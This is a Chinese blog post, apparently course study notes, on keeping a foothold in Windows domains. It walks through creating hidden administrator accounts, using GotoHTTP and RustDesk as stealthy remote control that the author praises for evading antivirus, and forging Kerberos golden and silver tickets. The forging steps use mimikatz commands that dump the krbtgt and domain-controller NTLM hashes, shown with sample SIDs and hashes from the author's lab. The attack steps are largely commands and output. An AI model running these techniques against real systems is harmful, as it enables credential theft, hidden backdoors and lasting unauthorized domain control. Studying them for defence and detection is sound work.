142-权限维持&黄金白银票据&隐藏账户&C2远控&RustDesk&GotoHTTP

最新推荐文章于 2024-11-02 10:33:10 发布
最新推荐文章于 2024-11-02 10:33:10 发布
阅读量1k 收藏 24
点赞数 18
分类专栏: # 小迪安全学习笔记 文章标签: web安全 网络 安全 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63855540/article/details/141499657
版权

内网域&单机版-权限维持-基于用户-隐藏用户

工具原理:

        添加用户时在用户名上添加$符号,将该用户的用户组设置为空(单主机环境为空,域环境为administrator组),导致无法删除(在注册表中也可以进行隐藏)

CreateHiddenAccount_upx_v0.2.exe -u test1111 -p test1111

控制面板能查看到,命令查看看不到,单机版无法删除,域环境可以删除

CreateHiddenAccount_upx_v0.2.exe -c

对于只使用命令创建的隐藏账号只能做到在命令行隐藏无法再管理界面隐藏

内网域-权限维持-基于软件-GotoHTTP&RustDesk—无需安装

GotoHTTP

GotoHTTP - Online remote control platform

这个确实好用,不是C2C而是B2C的模式,用网页去远程控制。也就是说只要放行了443端口就可以远控

并且此程序只有3M大小,免杀,而且用来连接的id和控制码都会在程序运行后生成的ini文件中看得到,无敌远控

流量走https协议,只要目标放行443端口出口就可以实现内网穿透。

在低带宽也可以使用,运行占用内存极低,控制时占用CPU仅为0%-3%。

被控端在类Linux系统上支持图形界面(GUI)和字符界面(CLI)。

网络唤醒远程主机需加载驱动,导致运行时安全卫士会拦截这行为,其他杀软不会拦截。

在官网直接控制

好烧现在要收费了,而且是先使用后付费的方式

rustdesk

RustDesk – 开源远程桌面访问软件

连接所需的id密码在 C:\Users\用户名\AppData\Roaming\RustDesk\config

目前版本的id和密码被加密了,市面上没看到有相关的解密工具。可以忽略了

但是他有一个优点就是可以内网使用ip直连

内网域-权限维持-基于服务TGT-黄金白银票据

也是讲到过很多次的黄金白银票据了,要弄懂这两个票据,就得先搞清楚kerberos协议,我也写了一篇关于自己对kerberos协议浅显理解的文章,可以先看看。

黄金票据

krbtgt 的NTLM Hash如果泄露了,那么TGT就能被解密甚至伪造。伪造的TGT叫做黄金票据。

1、已经拿下域管理员,获取到krbtgt hash;

2、利用krbtgt的hash制作黄金票据工具,进行攻击。

获取相关信息

whoami /user

whoami /all

wmic useraccount get name,sid

域名 niganma.hhh

SID S-1-5-21-2427835825-1083592024-1743899581-500

获取krbtgt的hash

mimikatz privilege::debug

mimikatz lsadump::lsa /patch #导出所有机器用户的hash值,找到user=krbtgt的hash值

49d67397977b77b72227f1942de12e00

伪造用户名 user3(想要伪造的都可以)

生成票据(此命令不需要管理员权限)

mimikatz kerberos::golden /user:user3 /domain:niganma.hhh /sid:S-1-5-21-2427835825-1083592024-1743899581-500 /krbtgt:49d67397977b77b72227f1942de12e00 /ticket:goldentgt (goldentgt是自己取的名字)

为了证明现将票据都清空

然后将生成的票据goldentgt导入内存

kerberos::ptt goldentgt

成功访问域控

黄金票据总结:

该攻击⽅式其实是⼀种后⻔的形式,属于第⼆次进⾏攻击的⽅法。

第⼀次拿到域管权限之后,需要将krbtgt NTLM hash进⾏保存,当第⼆次再来进⾏域渗透攻击时,我们就可使⽤krbtgt的NTLM hash制作⻩⾦票据,从⽽再次获得域管权限。

白银票据

ST(Ticket )是由Server的NTLM Hash进行加密的,如果该Hash泄露,那么就可以解密甚至伪造Ticket。伪造的Ticket 叫做白银票据。

1、已经拿下域管理员,获取到DC hash;

2、利用DC的hash制作白银票据工具,进行攻击。

域名 niganma.hhh

SID S-1-5-21-2427835825-1083592024-1743899581 (后面的1000之类的可以删除)

获取域DC账户的NTLM Hash

mimikatz privilege::debug

mimikatz sekurlsa::logonpasswords

选机器账户的,我这里机器叫DC

NTLM:09c407a9283a018267c5a7f550fc6638

导入票据

用户名:user3

rc4就是获取的NTLM

cifs:共享文件

mimikatz kerberos::golden /user:user3 /domain:niganma.hhh /sid:S-1-5-21-2427835825-1083592024-1743899581 /target:DC /service:cifs /rc4:09c407a9283a018267c5a7f550fc6638 /ptt

成功连接

白银票据只能伪造访问具体服务的票据,这里伪造的是CIFS服务的票据,所以才能进行文件的查看。

dreamer292
关注
专栏目录
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
攻击者可以创建Golden Ticket(黄金票据)和Silver Ticket(白银票据)来模拟合法的Kerberos票证,以此提升权限。Golden Ticket是伪造的TGT,允许攻击者长时间保持权限;而Silver Ticket则是针对特定服务的伪造TGS...
windows权限维持黄金白银票据&隐藏用户&远控&RustDesk&GotoHttp
剁椒鱼头没剁椒的博客
08-16 1989
总的来说隐藏用户目前的手段基本上服务器出现问题,第一件事都是查询隐藏用户,所以这个算是后门的一种方式,但是现在再来看已经不是那么好用了。这个工具存在一个问题就是有网络的情况下才能够使用,而在无网络的情况下是无法使用的,同时流量是走https协议,需要目标主机开放443端口。简单来说就是:有网络,无限制,可以使用。有网络,如果防火墙限制了443端口,无法使用。无网络,无限制,可以使用,但是可能需要转发,比较麻烦。无网络,有限制,基本上就是无法使用。
再谈2003 Server下隐藏帐号的建立
weixin_34303897的博客
12-13 118
前言   前段时间写过一篇关于2003 SERVER下克隆帐户设置及检测的文章(2003 Server下隐藏帐号的建立http://waringid.blog.51cto.com/65148/428111)。随后发现用这种方法存在一个很大的问题:当系统重新启动后开始建立已隐藏的帐户会重新出现在“用户管理”控制页中。   在实际的例子中发现很多情况下******服务器不会采取直接新建隐藏用户的方...
内网渗透-权限维持-Windows系统隐藏账户
zzgslh的博客
04-21 756
内网渗透-权限维持-Windows系统隐藏账户 通过建立隐藏账户,制作系统用户远程控制后门,维持Windows系统权限。 手法步骤 1.首先打开cmd,通过命令,创建一个名为test$的隐藏账户,并且把该隐藏账户提升为了管理员权限。 net user test$ test123! /add net localgroup administrators test$ /add 2.使用net...
windows server 2008 R2 AD 域之---用组策略隐藏域用户磁盘驱动器(盘符)
weixin_33849215的博客
03-07 2064
由于Windows server 2008 采用的域配置文件是*.admx的文件,而并非2003中的*.adm文件,所以根据微软http://support.microsoft.com/kb/231289 这篇文章没有办法解决Windows server 2008下隐藏指定盘符的问题,经过这两×××索国外一些资料的总结。现在终于解决了这个问题,详细步骤如下: ...
白银黄金价格图表「Silver & Gold Price Charts」-crx插件
03-20
保持最新 - 目前的银,金,钯和铂现货价格走势图。 美元,欧元和实时报价中的白银黄金,铂金和钯金价格图表。 支持语言:English
黄金白银价格「Gold & Silver price」-crx插件
03-19
实时的黄金白银价格 实时黄金白银价格 支持语言:English
DFMobile - Forex & CFD Trading-crx插件
04-03
语言:Deutsch,English,Français,español,română,българс...特点:-灵活易用的界面-快速准确的实时图表和市场数据-各种订单(市场,限价,止损,OCO)-交易77个外汇对,黄金白银和差价合约,股票指数和商品
2021年有色行业投资策略:铜铝&黄金共振,锂钴起舞.pdf
08-25
3. **贵金属**:报告维持黄金价格创历史新高观点不变,并关注白银的补涨机会。2020年全球货币宽松政策导致黄金避险需求增加,金价走高。白银由于其工业需求和投资属性,可能跟随黄金上涨趋势。 4. **推荐标的**:在...
2024年网络安全进阶手册:黑客技术自学路线
2401_85026965的博客
10-29 1169
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
2024年网络安全(黑客技术)三个月自学手册
csbDD的博客
10-29 1676
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-26 913
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
泄密与间谍:网络安全与国家安全的紧密联系
weixin_62641226的博客
10-30 515
泄密是指机密信息被未经授权的个人或组织获取并传播的行为。这些信息可能涉及国家安全、商业秘密、个人隐私等。泄密事件不仅可能导致国家利益受损,还可能对公众信任造成严重影响。
Juniper网络安全
swqd123456的博客
11-01 341
瞻博网络高级威胁防御 (ATP) 是网络的威胁情报中心,配备一系列内置的高级威胁服务,可借助 AI 和机器学习功能检测攻击并优化实施。Junos 以其高度可靠和可扩展的特性而闻名,具有丰富的网络功能和管理工具。3、SRX防火墙: SRX系列是Juniper的安全设备,用于提供高级网络安全功能,包括防火墙、 入侵检测和防御、 虚拟专用网络(VPN)和流量分析等。总而言之,Juniper提供了一系列的网络产品和解决方案,以满足企业和服务提供商的需求,并帮助他们构建和管理高性能、安全和可靠的网络基础设施。
“微软蓝屏”事件暴露了网络安全哪些问题?
最新发布
weixin_44626085的博客
11-02 477
想象一下:一天下午,突然间,整个公司内部的电脑开始崩溃,员工们面面相觑,屏幕上闪烁着蓝色的“死机”提示。根据光明网的报道,这正是在2024年7月19日所发生的事情。全球大量Windows用户遭遇了电脑崩溃、蓝屏死机和无法重启的情况,这场技术风暴迅速冲上了微博热搜第一。你可能会想,这究竟是怎么发生的?此次事件的根源在于网络安全公司“众击”(CrowdStrike)的一次技术更新失误,他们的防病毒软件中含有致命错误。这一错误直接导致了Windows系统的崩溃,形成了大家熟知的“蓝屏死机”。
网络安全(黑客)自学
白帽子凯哥聊黑客
10-27 1044
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
企业如何评估自身网络安全等级?
w13359990065的博客
10-30 317
通过上述步骤,企业可以系统地评估自身的网络安全等级,并据此制定相应的安全措施和改进计划。企业评估自身网络安全等级是一个系统性的过程,涉及到对企业网络环境的全面分析和评估。应急响应计划:评估企业是否有有效的应急响应计划,以及该计划的可执行性。定义评估范围:确定需要评估的网络资产,包括硬件、软件、数据和人员等。聘请专业机构:考虑聘请专业的网络安全评估机构进行客观的第三方评估。记录评估过程:详细记录评估过程和结果,为未来的审计和改进提供依据。编制评估报告:编制详细的评估报告,包括发现的问题、建议和改进措施。
内网中黄金票据白银票据的区别
05-14
在内网中,黄金票据白银票据通常是指两种不同的身份验证方式。 黄金票据是指一个用于身份验证的加密令牌,它被称为黄金是因为它具有最高的权限级别。黄金票据可以让用户在网络中获得管理员级别的访问权限,因此它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值